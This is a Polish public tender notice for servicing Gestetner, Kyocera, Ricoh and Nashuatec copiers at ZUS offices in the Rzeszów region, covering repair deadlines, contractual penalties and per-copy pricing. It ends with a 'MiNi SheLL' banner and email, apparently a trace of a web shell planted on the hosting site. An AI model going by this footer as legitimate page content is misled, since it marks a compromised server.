7. Wykonawca zobowiązany jest, przed zakończeniem umowy lub po jej zerwaniu z przyczyn lezących po stronie Wykonawcy , do wykonania końcowego przeglądu kserokopiarek. Przegląd taki ma za zadanie sprawdzenie, czy przekazywany sprzęt jest w pełni sprawny i funkcjonalny. Za sprzęt w pełni sprawny i funkcjonalny  uznany zostanie sprzęt , w którym:
- działają wszystkie funkcje maszyny.
- działają wszystkie urządzenia końcowe (finiszer, zszywacz). Zamawiający zobowiązany jest do zapewnienia wymaganej ilości zszywek i papieru do przeprowadzenia wymaganych testów. Ich brak nie upoważnia do odmowy podpisania Raportu Serwisowego, w takim przypadku uznaje się, ze maszyna jest sprawna.
- jest dobra jakość kopii. Jako wzorzec zostanie użyty dokument tekstowy dostarczony przez Zamawiającego zawierający czytelny tekst wydrukowany w czarnym kolorze na białym papierze. Strony uznają, że jakość kopii jest dobra, jeżeli kopia wykonana z wzorca będzie czytelna, bez rozmazań, zabrudzeń, smug i pasów.
8. Po spełnieniu warunków określonych w ust.7 w Raporcie Serwisowym zostaną dokonane wpisy: maszyna jest sprawna na zakończenie wizyty, kopie próbne wykonano, w uwagach - jakość kopii dobra - bez zastrzeżeń.
9. Jeżeli przegląd końcowy wykaże niesprawność maszyny, Wykonawca ma 5 dni roboczych na wykonanie niezbędnych napraw i doprowadzenie kserokopiarki do stanu pełnej sprawności, co musi być potwierdzone raportem Serwisowym na warunkach określonych  w ust. 7 i 8.
10. W przypadku jeżeli Wykonawca nie dotrzyma terminu określonego w pkt. 9 zobowiązany jest do zapłacenia kary umownej w wysokości 6 000,00 (sześć tysięcy) zł za każde urządzenie OCE, którego nie dało się doprowadzić do pełnej sprawności technicznej w ciągu 5 dni roboczych od zakończenia umowy.
 11.Jeżeli naprawa kopiarek potrwa dłużej niż 3 dni Wykonawca zobowiązany jest w tym czasie do dostarczenia kopiarki zastępczej o parametrach zbliżonych do kopiarki zepsutej. W przypadku niezrealizowania naprawy w ciągu 21 dni zostaną naliczane kary umowne za każdy dzień zwłoki w naprawie zgodnie z ust.16 .
 12. Na wykonane naprawy Wykonawca udziela 3 miesięcznej gwarancji na zasadach określonych     przepisami  kodeksu cywilnego.

13.Kwota wykonania kopii obejmuje koszty:
a) materiałów eksploatacyjnych (w tym tonery) oraz części zamiennych (dostarczone części zamienne oraz tonery muszą być oryginalne nie regenerowane),
b) materiałów zużytych podczas wykonywania konserwacji,
c) usuwania awarii wraz z usuwaniem uszkodzeń mechanicznych,
d) czynności konserwacyjnych wykonywanych zgodnie z wymogami i zaleceniami producenta urządzeń,
e) robocizny 
f) dojazdu w celu wykonania serwisu, napraw.
g) transportu kserokopiarek w przypadku konieczności ich naprawy w siedzibie Zleceniobiorcy
 
14.Cena  kopii nie obejmuje kosztów papieru do wykonywania kopii.
15. Podstawę wynagrodzenia za wykonywanie czynności będących przedmiotem zamówienia stanowi cena 100 kopii w wysokości:
 netto: ............ zł. (słownie: ...............),
 podatek od towarów i usług - VAT: 22 %, tj. ................. zł.,
 brutto: ................. zł. (słownie: ..........................................).
 
Wynagrodzenie za wykonywanie czynności będących przedmiotem umowy wypłacane będzie Wykonawcy każdorazowo po wykonaniu konserwacji, w wysokości obliczonej według następującego wzoru:

cena brutto 100 kopii x   liczba wykonanych kopii w okresie rozliczeniowym 
100

16. Zamawiającemu przysługują kary umowne:
a) w przypadku opóźnienia w wykonaniu czynności będących przedmiotem umowy Zamawiający obciąży Wykonawcę karami umownymi w wysokości 200,00 zł /dwieście złotych/ za każdy dzień opóźnienia  w naprawie kserokopiarek powyżej 21 dni od daty zgłoszenia. W takim przypadku kserokopiarka zastępcza pozostaje w dalszym ciągu u Zamawiającego .
b) w przypadku odstąpienia od umowy przez Zamawiającego z powodu okoliczności, za które odpowiada Wykonawca w wysokości 20% kwoty  wartości zamówienia.
17.W przypadku gdy w okresie rozliczeniowym (tj. raz w miesiącu) Wykonawca nie wykona konserwacji wynagrodzenie za ten okres nie przysługuje.

18.Zużyte materiały w tym materiały eksploatacyjne, tonery oraz części zamienne stają się własnością Wykonawcy.
19. Zamawiający zastrzega sobie prawo zmiany miejsca użytkowania kserokopiarek w poszczególnych terenowych jednostkach organizacyjnych O/ZUS Rzeszów. Zmiana ta nie będzie powodować zmiany wynagrodzenia.
20. Zamawiający na podstawie pisemnej prośby Oferenta udostępni kserokopiarki w celu ich oględzin w uzgodnionym terminie..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.31.31.00-3, 50.31.32.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Serwisowanie pozostałych Kserokopiarek.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostarczenie tonerów, materiałów eksploatacyjnych i części zamiennych oraz świadczenie usług serwisowych polegających na pogwarancyjnym usuwaniu usterek i okresowych czynnościach przeglądowych kserokopiarek ZUS Oddział w Rzeszowie oraz podległych Inspektoratach.

1. Przedmiot zamówienia obejmuje następujące typy kopiarek:
1.1. Kopiarki GESTETNER 3235
a) w Oddziale ZUS w Rzeszowie przy   ul. 8 Marca 3                            -2 szt.
b) w Oddziale ZUS w Rzeszowie przy   ul. Piłsudskiego 12                   -1 szt.
c) w Oddziale ZUS w Rzeszowie przy   ul. Siemiradzkiego 10               -1 szt. 
d) w Inspektoracie ZUS w Mielcu przy ul. Sikorskiego 4                      -1 szt. 
e) w Inspektoracie ZUS w Leżajsku przy ul. Mickiewicza 24                -1 szt.
f) w Inspektoracie ZUS w Przeworsku przy ul. Dworcowej 1               - 2 szt.
g) w Inspektoracie ZUS w Jarosławiu przy  ul. Słowackiego 21           -1 szt.
h) w Inspektoracie ZUS w Przemyślu przy  ul.  Brodzińskiego 6          -1 szt.
i) w Inspektoracie ZUS w Tarnobrzegu przy  ul. Sienkiewicza 145D   -1 szt.

1.2. Kopiarki Kyocera Mita 4530 
a) w Oddziale ZUS w Rzeszowie przy   ul. Piłsudskiego 12                    -1 szt.
b) w Oddziale ZUS w Rzeszowie przy   ul. Niepodległości 3                   -1 szt.
c) w Inspektoracie ZUS w Stalowej Woli przy  ul. Popiełuszki 8            -1 szt.
d) w Inspektoracie ZUS w Przemyślu przy  ul.  Brodzińskiego 6           -1 szt.
e) w Biurze Terenowym w Lubaczowie przy ul. Legionów 4                   -1 szt.

1.3. Kopiarki Ricoch 350
a) w Oddziale ZUS w Rzeszowie przy ulicy Piłsudskiego 12                   -2 szt.
1.4. Kopiarka Nashuatec
a) w Oddziale ZUS w Rzeszowie przy ulicy Piłsudskiego 12                   -1 szt.

      
2. W ramach umowy Wykonawca zobowiązuje się wykonywać poniższe prace zgodnie z dokumentacją techniczną oraz wymogami i zaleceniami producenta:
a)  konserwację kserokopiarek
b)  usuwanie awarii kserokopiarek
c)  dostawy materiałów eksploatacyjnych, części zamiennych i tonerów.
 
3. Ustala się harmonogram usług dotyczący Oddziału ZUS i Inspektoratu:
a)  konserwacja - raz w miesiącu.
c) Usunięcie awarii kserokopiarek w czasie nie dłuższym niż 3 dni po otrzymaniu pisemnego lub telefonicznego powiadomienia Zleceniobiorcy. Do czasu naprawy nie wlicza się: dni wolnych od pracy u Zamawiającego, niedziel i świąt.

 4. Wykonawca zobowiązany jest do zapewnienia prawidłowego funkcjonowania przyjętych w ramach umowy kserokopiarek w sposób zapewniający wykonywanie kopii dobrej jakości poprzez dostarczanie materiałów eksploatacyjnych, części zamiennych, tonerów, usuwanie awarii i konserwację.
 5. Wykonawca zobowiązuje się do wpisywania w protokołach czynności serwisowych wszelkich prac związanych z konserwacją, przeglądami, regulacjami i naprawami kserokopiarek oraz aktualnego stanu licznika.
 6. Wykonawca ponosi odpowiedzialność za szkody powstałe z jego winy podczas wykonywania prac będących przedmiotem umowy oraz za uszkodzenie sprzętu Zmawiającego powstałe podczas wykonywania czynności serwisowych,
 7.Wykonawca zobowiązany jest, po zakończeniu umowy lub zerwaniu umowy z przyczyn leżących po jego stronie, do protokolarnego przekazania kserokopiarek w stanie pełnej sprawności technicznej i wykonującej kopie dobrej jakości nie budzące zastrzeżeń Zamawiającego w terminie do 2 dni od zakończenia lub zerwania umowy. W przypadku nie dotrzymania powyższego terminu Zamawiającemu przysługuje kara umowna w wysokości  6000,00 zł /słownie sześć tysięcy złotych/, za każdą z kserokopiarek, które nie zostały przekazane w pełnej sprawności technicznej.
 8.Jeżeli naprawa kopiarek potrwa dłużej niż 3 dni Wykonawca zobowiązany jest w tym czasie do dostarczenia kopiarki zastępczej o parametrach zbliżonych do kopiarki zepsutej. W przypadku niezrealizowania naprawy w ciągu 21 dni zostaną naliczane kary umowne za każdy dzień zwłoki w naprawie zgodnie z pkt.13 .
 9. Na wykonane naprawy Wykonawca udziela 3 miesięcznej gwarancji na zasadach określonych     przepisami  kodeksu cywilnego.

10.Kwota wykonania kopii obejmuje koszty:
a)materiałów eksploatacyjnych (w tym tonery) oraz części zamiennych (dostarczone części zamienne oraz tonery muszą być oryginalne nie regenerowane),
b)materiałów zużytych podczas wykonywania konserwacji,
c) usuwania awarii wraz z usuwaniem uszkodzeń mechanicznych,
d) czynności konserwacyjnych wykonywanych zgodnie z wymogami i zaleceniami producenta urządzeń,
e) robocizny 
f) dojazdu w celu wykonania serwisu, napraw.
g) transportu kserokopiarek w przypadku konieczności ich naprawy w siedzibie Zleceniobiorcy
 
11.Cena  kopii nie obejmuje kosztów papieru do wykonywania kopii.

12. Podstawę wynagrodzenia za wykonywanie czynności będących przedmiotem zamówienia stanowi cena 100 kopii wykonanych na kserokopiarce  w wysokości:
 netto: ............ zł. (słownie: ...............),
 podatek od towarów i usług - VAT: 22 %, tj. ................. zł.,
 brutto: ................. zł. (słownie: ..........................................).
 
Wynagrodzenie za wykonywanie czynności będących przedmiotem umowy wypłacane będzie Wykonawcy każdorazowo po wykonaniu konserwacji, w wysokości obliczonej według następującego wzoru:

cena brutto 100 kopii x   liczba wykonanych kopii w okresie rozliczeniowym 
100

13. Zamawiającemu przysługują kary umowne:
a) w przypadku opóźnienia w wykonaniu czynności będących przedmiotem umowy Zamawiający obciąży Wykonawcę karami umownymi w wysokości 200,00 zł /dwieście złotych/ za każdy dzień opóźnienia  w naprawie kserokopiarek powyżej 21 dni od daty zgłoszenia. W takim przypadku kserokopiarka zastępcza pozostaje w dalszym ciągu u Zamawiającego .
b) w przypadku odstąpienia od umowy przez Zamawiającego z powodu okoliczności, za które odpowiada Wykonawca w wysokości 20% kwoty  wartości zamówienia.
14.W przypadku gdy w okresie rozliczeniowym (tj. raz w miesiącu) Wykonawca nie wykona konserwacji wynagrodzenie za ten okres nie przysługuje.

15.Zużyte materiały w tym materiały eksploatacyjne, tonery oraz części zamienne stają się własnością Wykonawcy.
16.Zamawiający zastrzega sobie prawo zmiany miejsca użytkowania kserokopiarek w poszczególnych terenowych jednostkach organizacyjnych O/ZUS Rzeszów. Zmiana ta nie będzie powodować zmiany wynagrodzenia.
17. Zamawiający na podstawie pisemnej prośby Oferenta udostępni kserokopiarki w celu ich oględzin w uzgodnionym terminie..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.31.31.00-3, 50.31.32.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com